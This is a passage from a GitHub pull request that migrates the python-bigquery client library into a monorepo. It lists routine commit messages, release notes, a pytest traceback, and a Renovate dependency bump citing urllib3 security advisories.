
chore(migration): Migrate code from googleapis/python-bigquery into packages/google-cloud-bigquery#16008

Draft
parthea wants to merge 2071 commits into main from
migration.python-bigquery.migration.2026-03-02_16-59-45.migrate

Conversation


parthea commented Mar 2, 2026

See #10980.

This PR should be merged with a merge-commit, not a squash-commit, in order to preserve the git history.

Linchin and others added 30 commits May 6, 2024 16:46
* feat: support insertAll for range

* revert INTERVAL regex

* lint

* add unit test

* lint
* fix: add pyarrow version check for range support

* add comment why we are making a separate constant

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
* add new presubmit for test purposes

* add additional sessions

* Update .kokoro/presubmit/presubmit-2.cfg

* Update .kokoro/presubmit/presubmit-2.cfg

* added timer to nox sessions

* Update .kokoro/presubmit/presubmit-2.cfg

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* removes references to most environment variables

* testing the use of base names for the nox sessions

* removes references to unneeded linting and typing env variables

* change file name and update env_vars in presubmit-2

* remove timed decorators

* revert several files

* Update noxfile.py

* remove test, remove unneeded vars, etc

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* feat: adds timer decorator to sessions

* updates _calculate_duration function

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* Update samples/geography/requirements.txt

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* pin grpcio===1.62.2 for python 3.7

support for Python 3.7 is dropped starting with grpcio 1.63

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
…1925)

* perf: decrease the threshold in which we use the BQ Storage Read API

* fix unit test

* update comment
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
* Update format_options.py to include the newly added map target type.

The map target type creates a schema without the added key_value repeated field.

* Added tests

* add unit test

* lint

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
#1933)

* chore(deps): bump requests from 2.31.0 to 2.32.2 in /samples/geography

Bumps [requests](https://github.com/psf/requests) from 2.31.0 to 2.32.2.
- [Release notes](https://github.com/psf/requests/releases)
- [Changelog](https://github.com/psf/requests/blob/main/HISTORY.md)
- [Commits](psf/requests@v2.31.0...v2.32.2)

---
updated-dependencies:
- dependency-name: requests
  dependency-type: direct:production
...

Signed-off-by: dependabot[bot] <support@github.com>

* pin requests==2.31.0 for python 3.7

---------

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore: add warning if storage module not found

* Update tests/unit/test_table.py

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>

* Update tests/unit/test_table.py

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>

---------

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
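The warning described in this chore follows the common optional-dependency guard pattern. A minimal sketch, assuming a module-level sentinel and an illustrative warning message (the library's exact wording may differ):

```python
import warnings

try:
    # Optional dependency: enables the faster BQ Storage Read API download path.
    from google.cloud import bigquery_storage
except ImportError:
    bigquery_storage = None
    warnings.warn(
        "google-cloud-bigquery-storage is not installed; "
        "falling back to the slower REST download path."
    )

# Later code checks the sentinel before choosing the fast path.
use_fast_path = bigquery_storage is not None
```

The sentinel keeps the rest of the code free of repeated try/except blocks: callers only test `bigquery_storage is not None`.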
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
* feat: add default timeout for Client.get_job()

* change timeout type detection

* lint

* fix unit test and coverage

* add type hint

* fix type hint

* change import style and add comments

* remove sentinel value in client

* type hint

* typo

* add sentinel for query_and_wait()

* add unit tests

* fix unit test

* Update google/cloud/bigquery/job/query.py

Co-authored-by: Tim Sweña (Swast) <swast@google.com>

* Update google/cloud/bigquery/job/query.py

Co-authored-by: Tim Sweña (Swast) <swast@google.com>

* address comments

* typo

* type hint

* typos

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
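The "add sentinel" commits above describe a classic default-argument pattern: a sentinel object distinguishes "caller passed nothing" from an explicit `timeout=None` (meaning "no timeout"). A standalone sketch, with a hypothetical default value chosen purely for illustration:

```python
DEFAULT_GET_JOB_TIMEOUT = 128.0  # assumed default, in seconds; not the library's constant
_UNSET = object()  # module-level sentinel: "argument was not supplied"

def get_job(job_id, timeout=_UNSET):
    """Simplified model of a get_job() call with a default timeout."""
    if timeout is _UNSET:
        # No argument supplied: apply the default.
        timeout = DEFAULT_GET_JOB_TIMEOUT
    # An explicit timeout, including None, passes through unchanged.
    return {"jobReference": {"jobId": job_id}, "timeout": timeout}
```

With a plain `timeout=None` default there would be no way to tell "unset" apart from an explicit request for no timeout; the sentinel keeps both behaviors available.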
This updates tests to use `max_iterations` rather than `max_iteration`,
which was an alpha option.

Related: b/344469351
…thon (#1941)

Updates the regular continuous CI/CD checks to test against specific versions of Python (versions that are neither our most recent nor our oldest supported version).

Also removes a CI/CD check that is superseded by a more recent one (prerelease-deps is replaced by prerelease-deps-3.12).

Modifies owlbot to keep it from adding prerelease-deps back into the mix, since that file is a default in synthtool.
…use to download first page of results (#1942)

* perf: if `page_size` or `max_results` is set on `QueryJob.result()`, use to download first page of results

* add unit tests for query_and_wait

* populate maxResults on page 2

* fix maxResults

* fix coverage

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
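The first-page optimization above can be modeled with a small helper. This is a simplified reconstruction of the idea, not the library's actual code; the function name is hypothetical:

```python
def first_page_max_results(page_size=None, max_results=None):
    """Pick maxResults for the first getQueryResults request, if any.

    When either hint is given, the first page should not download more
    rows than the caller will actually consume.
    """
    if page_size is not None and max_results is not None:
        return min(page_size, max_results)
    if page_size is not None:
        return page_size
    return max_results  # may be None: let the server choose a page size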
* fix: create query job in job.result() if doesn't exist

* Apply suggestions from code review

---------

Co-authored-by: Tim Sweña (Swast) <swast@google.com>
Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com>
…1949)

* test: update the results of test based on change to hacker news data

* Update tests/system/test_client.py

---------

Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
* chore(deps): update all dependencies

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* Update samples/geography/requirements.txt

* Update samples/geography/requirements.txt

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* feat: support load job option ColumnNameCharacterMap

* add unit test
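In REST terms, the new load option maps onto the `columnNameCharacterMap` field of the load job configuration. The payload below is an illustrative sketch; the bucket, project, and table names are made up:

```python
# Illustrative load-job payload; "V2" relaxes column-name character rules.
load_job_config = {
    "load": {
        "sourceUris": ["gs://example-bucket/data.csv"],  # hypothetical URI
        "destinationTable": {
            "projectId": "example-project",
            "datasetId": "example_dataset",
            "tableId": "example_table",
        },
        "columnNameCharacterMap": "V2",
    }
}
```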
…set (#1956)

* fix: do not overwrite page_size with max_results when start_index is set

* update test
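The fix above can be modeled as follows: a simplified sketch of how first-page request parameters should be assembled so that `page_size` is never clobbered by `max_results`. Parameter keys follow the REST API; the helper itself is hypothetical:

```python
def first_page_params(page_size=None, max_results=None, start_index=None):
    """Build tabledata.list parameters for the first page request.

    page_size takes precedence over max_results, so a caller that sets
    both start_index and page_size gets exactly the page size they asked for.
    """
    params = {}
    if start_index is not None:
        params["startIndex"] = start_index
    if page_size is not None:
        params["maxResults"] = page_size  # never overwritten by max_results
    elif max_results is not None:
        params["maxResults"] = max_results
    return params
```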
renovate-bot and others added 27 commits October 1, 2025 13:59
* update pyproject.toml to follow PEP 639

* Update pyproject.toml PEP 639

Thanks for the feedback,
I've removed the version number completely as requested.

* Update pyproject.toml

---------

Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
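For context, a PEP 639-style metadata block replaces the old license table and classifier with an SPDX expression string. This fragment is illustrative, not the project's exact file:

```toml
[project]
name = "google-cloud-bigquery"
# PEP 639: license is an SPDX expression string, not a table or classifier
license = "Apache-2.0"
license-files = ["LICENSE"]
```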
* chore(python): Add Python 3.14 to python post processor image

Source-Link: googleapis/synthtool@16790a3
Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:543e209e7c1c1ffe720eb4db1a3f045a75099304fb19aa11a47dc717b8aae2a9

* Update samples/snippets/noxfile.py

* Update samples/notebooks/noxfile.py

* Update samples/magics/noxfile.py

* Update samples/geography/noxfile.py

* Update samples/desktopapp/noxfile.py

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

* 🦉 Updates from OwlBot post-processor

See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md

---------

Co-authored-by: Owl Bot <gcf-owl-bot[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.

* Update google/cloud/bigquery/routine/routine.py

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.
- Addressed PyType errors by using helper functions for type conversion.

* Update tests/unit/routine/test_external_runtime_options.py

* feat: Add ExternalRuntimeOptions to BigQuery routine

This change introduces the `ExternalRuntimeOptions` class to the
`google.cloud.bigquery.routine` module, allowing users to configure
runtime options for external routines.

Key changes:
- Created the `ExternalRuntimeOptions` class with setters and getters for
  `container_memory`, `container_cpu`, `runtime_connection`,
  `max_batching_rows`, and `runtime_version`.
- Updated the `Routine` class to include an `external_runtime_options`
  property that accepts an `ExternalRuntimeOptions` object.
- Added comprehensive unit tests for the new class and its integration
  with the `Routine` class, including tests for both valid and invalid
  input values.
- Added additional tests to improve code coverage based on feedback.
- Addressed PyType errors by using helper functions for type conversion.
- Addressed formatting nits from code review.

---------

Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com>
Co-authored-by: Chalmer Lowe <chalmerlowe@google.com>
Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>
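A minimal sketch of the options class described above, assuming the dict-backed property style used elsewhere in the library. Only one of the five properties is shown; the names come from the commit message, and the validation message is illustrative:

```python
class ExternalRuntimeOptions:
    """Runtime options for external routines (simplified sketch)."""

    def __init__(self):
        self._properties = {}  # mirrors the JSON API representation

    @property
    def container_memory(self):
        return self._properties.get("containerMemory")

    @container_memory.setter
    def container_memory(self, value):
        # Reject invalid input early, as the unit tests described above do.
        if value is not None and not isinstance(value, str):
            raise ValueError("container_memory must be a string like '512M'")
        self._properties["containerMemory"] = value

opts = ExternalRuntimeOptions()
opts.container_memory = "512M"
```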
* feat: adds support for Python runtime 3.14

* adds step to install gdal

* adds files required by pyarrow

* adds repo required by pyarrow

* corrects url to repo required by pyarrow

* testing a theory with a conditional

* testing a theory with a conditional version of ubuntu

* testing a new approach to installing arrow

* testing a new approach to dearmoring the key

* back to the basics

* trying a conditional again.

* adds explanatory comment; resets ubuntu version to latest

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe

* Apply suggestion from @chalmerlowe
Towards googleapis/librarian#2456

Files removed which are no longer used:
- Owlbot config files, including owlbot.py
- Sync repo settings config file
- Release please config files
Temporarily pin `pytest < 9` to resolve the following issue

```
        for invalid_view_value in invalid_view_values:
>           with self.subTest(invalid_view_value=invalid_view_value):

tests/unit/test_client.py:810: 
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 
/opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__
    next(self.gen)
/opt/hostedtoolcache/Python/3.11.14/x64/lib/python3.11/contextlib.py:144: in __exit__
    next(self.gen)
.nox/unit-3-11/lib/python3.11/site-packages/_pytest/unittest.py:438: in addSubTest
    self.ihook.pytest_runtest_logreport(report=sub_report)
.nox/unit-3-11/lib/python3.11/site-packages/pluggy/_hooks.py:512: in __call__
    return self._hookexec(self.name, self._hookimpls.copy(), kwargs, firstresult)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/pluggy/_manager.py:120: in _hookexec
    return self._inner_hookexec(hook_name, methods, kwargs, firstresult)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:289: in pytest_runtest_logreport
    self.sendevent("testreport", data=data)
.nox/unit-3-11/lib/python3.11/site-packages/xdist/remote.py:126: in sendevent
    self.channel.send((name, kwargs))
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:912: in send
    self.gateway._send(Message.CHANNEL_DATA, self.id, dumps_internal(item))
                                                      ^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1629: in dumps_internal
    return _Serializer().save(obj)  # type: ignore[return-value]
           ^^^^^^^^^^^^^^^^^^^^^^^
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1647: in save
    self._save(obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1744: in save_tuple
    self._save(item)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1667: in _save
    dispatch(self, obj)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1740: in save_dict
    self._write_setitem(key, value)
.nox/unit-3-11/lib/python3.11/site-packages/execnet/gateway_base.py:1734: in _write_setitem
    self._save(value)
_ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ 

self = <execnet.gateway_base._Serializer object at 0x7fc425a0c710>
obj = <object object at 0x7fc425bcb920>

    def _save(self, obj: object) -> None:
        tp = type(obj)
        try:
            dispatch = self._dispatch[tp]
        except KeyError:
            methodname = "save_" + tp.__name__
            meth: Callable[[_Serializer, object], None] | None = getattr(
                self.__class__, methodname, None
            )
            if meth is None:
>               raise DumpError(f"can't serialize {tp}") from None
E               execnet.gateway_base.DumpError: can't serialize <class 'object'>
```

The upstream issue is tracked in
pytest-dev/pytest-xdist#1273
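A temporary pin like the one described could live in the testing constraints file; the exact file location is an assumption:

```
# testing constraint: keep pytest below 9 until pytest-dev/pytest-xdist#1273 is fixed
pytest < 9
```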
This PR updates the librarian SHA to support v1.0.0.
…e with pyarrow (#2338)

Due to an issue with `pyarrow`, a significant dependency for certain
python-bigquery use cases, not being compatible with Python 3.14, we
temporarily skipped the failing CI/CD check for 3.14 while awaiting the
update to pyarrow. Pyarrow is now fully compatible, so that filter is
being removed.

**KNOWN ISSUES**: this will show that unit tests for 3.14 are failing. That has
nothing to do with this PR/these changes and is being addressed in a separate
change. It is due to a missing dependency related to handling IO for
`geopandas` (namely `libgdal-dev`, etc., which are normally installed with
`pyogrio` + `geopandas`). Because `pyogrio` is currently not compatible with
Python 3.14, the tests on 3.14 cannot complete.

This should not prevent **this PR from being merged** to help solve the
current issue, which is a blocker for getting our continuous tests to
green.
This PR effectively moves ownership of this repo to the Python language
team, and removes api-bigquery as the de facto code owner.
PR created by the Librarian CLI to initialize a release. Merging this PR
will auto trigger a release.

Librarian Version: v0.7.0
Language Image:
us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.39.0</summary>

## [3.39.0](googleapis/python-bigquery@v3.38.0...v3.39.0) (2025-12-12)

### Features

* adds support for Python runtime 3.14 (#2322)
([6065e14c](googleapis/python-bigquery@6065e14c))

* Add ExternalRuntimeOptions to BigQuery routine (#2311)
([fa76e310](googleapis/python-bigquery@fa76e310))

### Bug Fixes

* remove ambiguous error codes from query retries (#2308)
([8bbd3d01](googleapis/python-bigquery@8bbd3d01))

* include `io.Base` in the `PathType` (#2323)
([b11e09cb](googleapis/python-bigquery@b11e09cb))

* honor custom `retry` in `job.result()` (#2302)
([e118b029](googleapis/python-bigquery@e118b029))

### Documentation

* remove experimental annotations from GA features (#2303)
([1f1f9d41](googleapis/python-bigquery@1f1f9d41))

</details>

Co-authored-by: Daniel Sanche <d.sanche14@gmail.com>
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [urllib3](https://redirect.github.com/urllib3/urllib3) ([changelog](https://redirect.github.com/urllib3/urllib3/blob/main/CHANGES.rst)) | `==2.5.0` -> `==2.6.0` | ![age](https://developer.mend.io/api/mc/badges/age/pypi/urllib3/2.6.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/pypi/urllib3/2.5.0/2.6.0?slim=true) |

### GitHub Vulnerability Alerts

#### [CVE-2025-66418](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53)

## Impact

urllib3 supports chained HTTP encoding algorithms for response content
according to RFC 9110 (e.g., `Content-Encoding: gzip, zstd`).

However, the number of links in the decompression chain was unbounded
allowing a malicious server to insert a virtually unlimited number of
compression steps leading to high CPU usage and massive memory
allocation for the decompressed data.

## Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier for
HTTP requests to untrusted sources unless they disable content decoding
explicitly.

## Remediation

Upgrade to at least urllib3 v2.6.0 in which the library limits the
number of links to 5.

If upgrading is not immediately possible, use
[`preload_content=False`](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
and ensure that `resp.headers["content-encoding"]` contains a safe
number of encodings before reading the response content.
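The header check suggested in this remediation can be sketched as a small helper; the limit of 5 matches what urllib3 v2.6.0 enforces, but the function itself is hypothetical:

```python
def encoding_chain_is_safe(headers, limit=5):
    """Return True if the Content-Encoding chain has at most `limit` links."""
    raw = headers.get("content-encoding", "")
    encodings = [token.strip() for token in raw.split(",") if token.strip()]
    return len(encodings) <= limit
```

With `preload_content=False`, an application would call this on `resp.headers` before reading the response body.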

#### [CVE-2025-66471](https://redirect.github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37)

### Impact

urllib3's [streaming
API](https://urllib3.readthedocs.io/en/2.5.0/advanced-usage.html#streaming-and-i-o)
is designed for the efficient handling of large HTTP responses by
reading the content in chunks, rather than loading the entire response
body into memory at once.

When streaming a compressed response, urllib3 can perform decoding or
decompression based on the HTTP `Content-Encoding` header (e.g., `gzip`,
`deflate`, `br`, or `zstd`). The library must read compressed data from
the network and decompress it until the requested chunk size is met. Any
resulting decompressed data that exceeds the requested amount is held in
an internal buffer for the next read operation.

The decompression logic could cause urllib3 to fully decode a small
amount of highly compressed data in a single operation. This can result
in excessive resource consumption (high CPU usage and massive memory
allocation for the decompressed data; CWE-409) on the client side, even
if the application only requested a small chunk of data.

### Affected usages

Applications and libraries using urllib3 version 2.5.0 and earlier to
stream large compressed responses or content from untrusted sources.

`stream()`, `read(amt=256)`, `read1(amt=256)`, `read_chunked(amt=256)`,
`readinto(b)` are examples of `urllib3.HTTPResponse` method calls using
the affected logic unless decoding is disabled explicitly.

### Remediation

Upgrade to at least urllib3 v2.6.0 in which the library avoids
decompressing data that exceeds the requested amount.

If your environment contains a package facilitating the Brotli encoding,
upgrade to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 too. These
versions are enforced by the `urllib3[brotli]` extra in the patched
versions of urllib3.

### Credits

The issue was reported by @Cycloctane.
Supplemental information was provided by @stamparm during a
security audit performed by [7ASecurity](https://7asecurity.com/) and
facilitated by [OSTIF](https://ostif.org/).

---

### Release Notes

<details>
<summary>urllib3/urllib3 (urllib3)</summary>

### [`v2.6.0`](https://redirect.github.com/urllib3/urllib3/blob/HEAD/CHANGES.rst#260-2025-12-05)

[Compare Source](https://redirect.github.com/urllib3/urllib3/compare/2.5.0...2.6.0)

## Security

- Fixed a security issue where the streaming API could improperly handle highly compressed HTTP content ("decompression bombs"), leading to excessive resource consumption even when a small amount of data was requested. Reading small chunks of compressed data is safer and much more efficient now. ([GHSA-2xpw-w6gg-jr37](https://github.com/urllib3/urllib3/security/advisories/GHSA-2xpw-w6gg-jr37))
- Fixed a security issue where an attacker could compose an HTTP response with virtually unlimited links in the `Content-Encoding` header, potentially leading to a denial of service (DoS) attack by exhausting system resources during decoding. The number of allowed chained encodings is now limited to 5. ([GHSA-gm62-xv2j-4w53](https://github.com/urllib3/urllib3/security/advisories/GHSA-gm62-xv2j-4w53))

> **Caution:**
>
> - If urllib3 is not installed with the optional `urllib3[brotli]` extra, but your environment contains a Brotli/brotlicffi/brotlipy package anyway, make sure to upgrade it to at least Brotli 1.2.0 or brotlicffi 1.2.0.0 to benefit from the security fixes and avoid warnings. Prefer using `urllib3[brotli]` to install a compatible Brotli package automatically.
> - If you use custom decompressors, please make sure to update them to respect the changed API of `urllib3.response.ContentDecoder`.

## Features

- Enabled retrieval, deletion, and membership testing in `HTTPHeaderDict` using bytes keys. ([#3653](https://github.com/urllib3/urllib3/issues/3653))
- Added host and port information to string representations of `HTTPConnection`. ([#3666](https://github.com/urllib3/urllib3/issues/3666))
- Added support for Python 3.14 free-threading builds explicitly. ([#3696](https://github.com/urllib3/urllib3/issues/3696))

## Removals

- Removed the `HTTPResponse.getheaders()` method in favor of `HTTPResponse.headers`. Removed the `HTTPResponse.getheader(name, default)` method in favor of `HTTPResponse.headers.get(name, default)`. ([#3622](https://github.com/urllib3/urllib3/issues/3622))

## Bugfixes

- Fixed redirect handling in `urllib3.PoolManager` when an integer is passed for the retries parameter. ([#3649](https://github.com/urllib3/urllib3/issues/3649))
- Fixed `HTTPConnectionPool` when used in Emscripten with no explicit port. ([#3664](https://github.com/urllib3/urllib3/issues/3664))
- Fixed handling of `SSLKEYLOGFILE` with expandable variables. ([#3700](https://github.com/urllib3/urllib3/issues/3700))

## Misc

- Changed the `zstd` extra to install `backports.zstd` instead of `zstandard` on Python 3.13 and before. ([#3693](https://github.com/urllib3/urllib3/issues/3693))
- Improved the performance of content decoding by optimizing the `BytesQueueBuffer` class. ([#3710](https://github.com/urllib3/urllib3/issues/3710))
- Allowed building the urllib3 package with newer setuptools-scm v9.x. ([#3652](https://github.com/urllib3/urllib3/issues/3652))
- Ensured successful urllib3 builds by setting the Hatchling requirement to >= 1.27.0. ([#3638](https://github.com/urllib3/urllib3/issues/3638))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no
schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/python-bigquery).


Co-authored-by: Lingqing Gan <lingqing.gan@gmail.com>

---------

Co-authored-by: gemini-code-assist[bot] <176961590+gemini-code-assist[bot]@users.noreply.github.com>
PR created by the Librarian CLI to initialize a release. Merging this PR
will auto trigger a release.

Librarian Version: v0.7.0
Language Image:
us-central1-docker.pkg.dev/cloud-sdk-librarian-prod/images-prod/python-librarian-generator@sha256:c8612d3fffb3f6a32353b2d1abd16b61e87811866f7ec9d65b59b02eb452a620
<details><summary>google-cloud-bigquery: 3.40.0</summary>

## [3.40.0](googleapis/python-bigquery@v3.39.0...v3.40.0) (2026-01-08)

### Features

* support load_table and list_rows with picosecond timestamp (#2351)
([46764a59](googleapis/python-bigquery@46764a59))

* support timestamp_precision in table schema (#2333)
([8d5785ae](googleapis/python-bigquery@8d5785ae))

</details>
### Description

This PR adds a `timeout` parameter to the `to_dataframe()` and
